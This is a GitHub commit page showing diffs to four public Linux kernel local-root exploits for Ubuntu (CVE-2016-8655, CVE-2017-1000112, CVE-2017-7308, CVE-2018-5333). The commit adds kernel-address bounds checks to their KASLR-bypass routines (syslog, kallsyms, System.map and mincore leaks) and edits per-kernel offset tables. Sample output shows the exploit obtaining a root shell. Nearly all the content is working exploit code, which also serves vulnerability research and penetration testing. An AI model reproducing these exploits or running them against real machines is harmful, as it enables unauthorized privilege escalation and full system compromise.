Skip to content

Commit

Permalink
Define KERNEL_BASE_MIN and KERNEL_BASE_MAX
Browse files Browse the repository at this point in the history
  • Loading branch information
@bcoles
bcoles committed Dec 28, 2019
1 parent 97ddd74 commit d9fbb39
Show file tree
Hide file tree
Showing 4 changed files with 82 additions and 56 deletions.
41 changes: 26 additions & 15 deletions CVE-2016-8655/chocobo_root.c
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
/*
chocobo_root.c
linux AF_PACKET race condition exploit for CVE-2016-8655.
Includes KASLR and SMEP bypasses.
Includes KASLR and SMEP bypasses. No SMAP bypass.
For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
All kernel offsets have been tested on Ubuntu / Linux Mint.
Expand Down Expand Up @@ -114,6 +114,8 @@ Updated by <[email protected]>
#define ENABLE_KASLR_BYPASS 1

#if ENABLE_KASLR_BYPASS
# define KERNEL_BASE_MIN 0xffffffff00000000ul
# define KERNEL_BASE_MAX 0xffffffffff000000ul
# define ENABLE_KASLR_BYPASS_KALLSYMS 1
# define ENABLE_KASLR_BYPASS_SYSMAP 1
# define ENABLE_KASLR_BYPASS_SYSLOG 1
Expand Down Expand Up @@ -666,6 +668,7 @@ void detect_versions() {
}

// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c

#if ENABLE_KASLR_BYPASS_SYSLOG
#define SYSLOG_ACTION_READ_ALL 3
Expand Down Expand Up @@ -694,30 +697,34 @@ int mmap_syslog(char** buffer, int* size) {
unsigned long get_kernel_addr_trusty(char* buffer, int size) {
const char* needle1 = "Freeing unused";
char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) return 0;
if (substr == NULL)
return 0;

int start = 0;
int end = 0;
for (end = start; substr[end] != '-'; end++);

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) return 0;
if (substr == NULL)
return 0;

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

r &= 0xffffffffff000000ul;
addr &= 0xffffffffff000000ul;

return r;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return 0;
}

unsigned long get_kernel_addr_xenial(char* buffer, int size) {
const char* needle1 = "Freeing unused";
char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) {
if (substr == NULL)
return 0;
}

int start = 0;
int end = 0;
Expand All @@ -726,17 +733,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) {
if (substr == NULL)
return 0;
}

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

r &= 0xfffffffffff00000ul;
r -= 0x1000000ul;
addr &= 0xfffffffffff00000ul;
addr -= 0x1000000ul;

return r;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return 0;
}

unsigned long get_kernel_addr_syslog() {
Expand All @@ -762,6 +771,7 @@ unsigned long get_kernel_addr_syslog() {
#endif

// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
// https://grsecurity.net/~spender/exploits/exploit.txt

#if ENABLE_KASLR_BYPASS_KALLSYMS
unsigned long get_kernel_addr_kallsyms() {
Expand Down Expand Up @@ -799,6 +809,7 @@ unsigned long get_kernel_addr_kallsyms() {
#endif

// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
// https://grsecurity.net/~spender/exploits/exploit.txt

#if ENABLE_KASLR_BYPASS_SYSMAP
unsigned long get_kernel_addr_sysmap() {
Expand Down Expand Up @@ -868,7 +879,7 @@ unsigned long get_kernel_addr_mincore() {
for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
addr = *(unsigned long*)(&buf[n]);
/* Kernel address space */
if (addr > 0xffffffff00000000 && addr < 0xffffffffff000000) {
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
addr &= 0xffffffffff000000ul;
if (munmap((void*)0x66000000, 0x20000000000))
dprintf("[-] munmap(): %m\n");
Expand Down
44 changes: 25 additions & 19 deletions CVE-2017-1000112/poc.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,7 @@
// ---
// $ gcc poc.c -o pwn -Wall
// $ ./pwn
// Linux Kernel UDP Fragmentation Offset (UFO) out-of-bounds write local root (CVE-2017-1000112)
// [.] checking kernel version...
// [.] kernel version '4.8.0-58-generic' detected
// [~] done, version looks good
Expand Down Expand Up @@ -85,6 +86,8 @@
#define ENABLE_SMEP_BYPASS 1

#if ENABLE_KASLR_BYPASS
# define KERNEL_BASE_MIN 0xffffffff00000000ul
# define KERNEL_BASE_MAX 0xffffffffff000000ul
# define ENABLE_KASLR_BYPASS_KALLSYMS 1
# define ENABLE_KASLR_BYPASS_SYSMAP 1
# define ENABLE_KASLR_BYPASS_SYSLOG 1
Expand Down Expand Up @@ -192,7 +195,6 @@ struct kernel_info kernels[] = {
{ "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
{ "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },

/* Untested:
{ "xenial", "4.8.0-34-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c837, 0x1b3d0, 0x4426aa, 0x4bfe3, 0x7c8c3, 0x130367, 0x64910, 0x4b7d0 },
{ "xenial", "4.8.0-36-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c837, 0x1b3d0, 0x4426aa, 0x4bfe3, 0x7c8c3, 0x130367, 0x64910, 0x4b7d0 },
{ "xenial", "4.8.0-39-lowlatency", 0xa6ec0, 0xa72d0, 0x8d, 0x76172, 0x11c837, 0x1b310, 0x442f8a, 0x108ea3, 0x7c8c3, 0x130367, 0x64910, 0x4b7c0 },
Expand All @@ -202,10 +204,8 @@ struct kernel_info kernels[] = {
{ "xenial", "4.8.0-45-lowlatency", 0xa6ec0, 0xa72d0, 0x8d, 0x46c32c, 0x11c837, 0x1b310, 0x442fba, 0x108ea3, 0x7c8c3, 0x130357, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-46-lowlatency", 0xa6ec0, 0xa72d0, 0x8d, 0x46c32c, 0x11c837, 0x1b310, 0x442fba, 0x108ea3, 0x7c8c3, 0x130357, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-49-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44312a, 0x41d233, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-51-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44312a, 0x41d233, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
//{ "xenial", "4.8.0-51-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44312a, 0x41d233, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-52-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44365a, 0x41d763, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
*/

{ "xenial", "4.8.0-53-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0xdf526, 0x11c847, 0x1b310, 0x44365a, 0x41d763, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-54-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x1b061d, 0x11c847, 0x1b310, 0x44365a, 0x2e791c, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-56-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0xda43e, 0x11c847, 0x1b310, 0x4436aa, 0x2e796c, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
Expand Down Expand Up @@ -589,30 +589,34 @@ int mmap_syslog(char** buffer, int* size) {
unsigned long get_kernel_addr_trusty(char* buffer, int size) {
const char* needle1 = "Freeing unused";
char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) return 0;
if (substr == NULL)
return 0;

int start = 0;
int end = 0;
for (end = start; substr[end] != '-'; end++);

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) return 0;
if (substr == NULL)
return 0;

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

addr &= 0xffffffffff000000ul;

r &= 0xffffffffff000000ul;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return r;
return 0;
}

unsigned long get_kernel_addr_xenial(char* buffer, int size) {
const char* needle1 = "Freeing unused";
char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) {
if (substr == NULL)
return 0;
}

int start = 0;
int end = 0;
Expand All @@ -621,17 +625,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) {
if (substr == NULL)
return 0;
}

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

r &= 0xfffffffffff00000ul;
r -= 0x1000000ul;
addr &= 0xfffffffffff00000ul;
addr -= 0x1000000ul;

return r;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return 0;
}

unsigned long get_kernel_addr_syslog() {
Expand Down Expand Up @@ -893,7 +899,7 @@ unsigned long get_kernel_addr_mincore() {
for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
addr = *(unsigned long*)(&buf[n]);
/* Kernel address space */
if (addr > 0xffffffff00000000 && addr < 0xffffffffff000000) {
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
addr &= 0xffffffffff000000ul;

if (munmap((void*)0x66000000, 0x20000000000))
Expand Down Expand Up @@ -979,7 +985,7 @@ void setup_sandbox() {
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
dprintf("[-] unshare(CLONE_NEWUSER): %m\n");
dprintf("[-] unshare(CLONE_NEWNET): %m\n");
exit(EXIT_FAILURE);
}

Expand Down
31 changes: 17 additions & 14 deletions CVE-2017-7308/poc.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
//
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
// ---
// $ gcc poc.c -o pwn
// $ gcc poc.c -o pwn -Wall
// $ ./pwn
// Linux Kernel AF_PACKET packet_set_ring heap out-of-bounds write local root (CVE-2017-7308)
// [.] checking kernel version
Expand Down Expand Up @@ -93,6 +93,8 @@
#define ENABLE_SMEP_SMAP_BYPASS 1

#if ENABLE_KASLR_BYPASS
# define KERNEL_BASE_MIN 0xffffffff00000000ul
# define KERNEL_BASE_MAX 0xffffffffff000000ul
# define ENABLE_KASLR_BYPASS_KALLSYMS 1
# define ENABLE_KASLR_BYPASS_SYSMAP 1
# define ENABLE_KASLR_BYPASS_SYSLOG 1
Expand Down Expand Up @@ -324,7 +326,7 @@ void oob_timer_execute(void *func, unsigned long arg) {
}

void oob_id_match_execute(void *func) {
int s = oob_setup(2048 + XMIT_OFFSET - 64);
oob_setup(2048 + XMIT_OFFSET - 64);

int ps[32];

Expand Down Expand Up @@ -513,7 +515,7 @@ unsigned long get_kernel_addr_syslog_xenial() {
int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
if (size == -1) {
dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
exit(EXIT_FAILURE);
return 0;
}

size = (size / getpagesize() + 1) * getpagesize();
Expand All @@ -523,30 +525,31 @@ unsigned long get_kernel_addr_syslog_xenial() {
size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
if (size == -1) {
dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
exit(EXIT_FAILURE);
return 0;
}

const char *needle1 = "Freeing SMP";
char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) {
exit(EXIT_FAILURE);
}
if (substr == NULL)
return 0;

for (size = 0; substr[size] != '\n'; size++);

const char *needle2 = "ffff";
substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
if (substr == NULL) {
exit(EXIT_FAILURE);
}
if (substr == NULL)
return 0;

char *endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

addr &= 0xfffffffffff00000ul;
addr -= 0x1000000ul;

r &= 0xfffffffffff00000ul;
r -= 0x1000000ul;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return r;
return 0;
}
#endif

Expand Down
22 changes: 14 additions & 8 deletions CVE-2018-5333/cve-2018-5333.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -75,7 +75,7 @@
// [.] prepare_kernel_cred: ffffffff9f0a50e0
// [.] mmapping fake stack...
// [~] done, fake stack mmapped
// [.] executing payload 402119...
// [.] executing payload 0x402119...
// [+] got root
// # id
// uid=0(root) gid=0(root) groups=0(root)
Expand Down Expand Up @@ -116,6 +116,8 @@
#define ENABLE_KASLR_BYPASS 1

#if ENABLE_KASLR_BYPASS
# define KERNEL_BASE_MIN 0xffffffff00000000ul
# define KERNEL_BASE_MAX 0xffffffffff000000ul
# define ENABLE_KASLR_BYPASS_KALLSYMS 1
# define ENABLE_KASLR_BYPASS_SYSMAP 1
# define ENABLE_KASLR_BYPASS_SYSLOG 1
Expand Down Expand Up @@ -149,6 +151,7 @@ struct kernel_info kernels[] = {
{ "4.4.0-21-generic #37-Ubuntu", 0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
{ "4.4.0-22-generic #40-Ubuntu", 0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005 },
{ "4.4.0-24-generic #43-Ubuntu", 0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125 },
{ "4.4.0-28-generic #47-Ubuntu", 0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc },
{ "4.4.0-31-generic #50-Ubuntu", 0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125 },
{ "4.4.0-38-generic #57-Ubuntu", 0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5 },
{ "4.4.0-42-generic #62-Ubuntu", 0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5 },
Expand Down Expand Up @@ -563,17 +566,20 @@ unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) {

if (substr == NULL)
return 0;
}

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

r &= 0xfffffffffff00000ul;
r -= 0x1000000ul;
addr &= 0xfffffffffff00000ul;
addr -= 0x1000000ul;

return r;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return 0;
}

unsigned long get_kernel_addr_syslog() {
Expand Down Expand Up @@ -753,7 +759,7 @@ unsigned long get_kernel_addr_mincore() {
for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
addr = *(unsigned long*)(&buf[n]);
/* Kernel address space */
if (addr > 0xffffffff00000000 && addr < 0xffffffffff000000) {
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
addr &= 0xffffffffff000000ul;
if (munmap((void*)0x66000000, 0x20000000000))
dprintf("[-] munmap(): %m\n");
Expand Down

0 comments on commit d9fbb39

Please sign in to comment.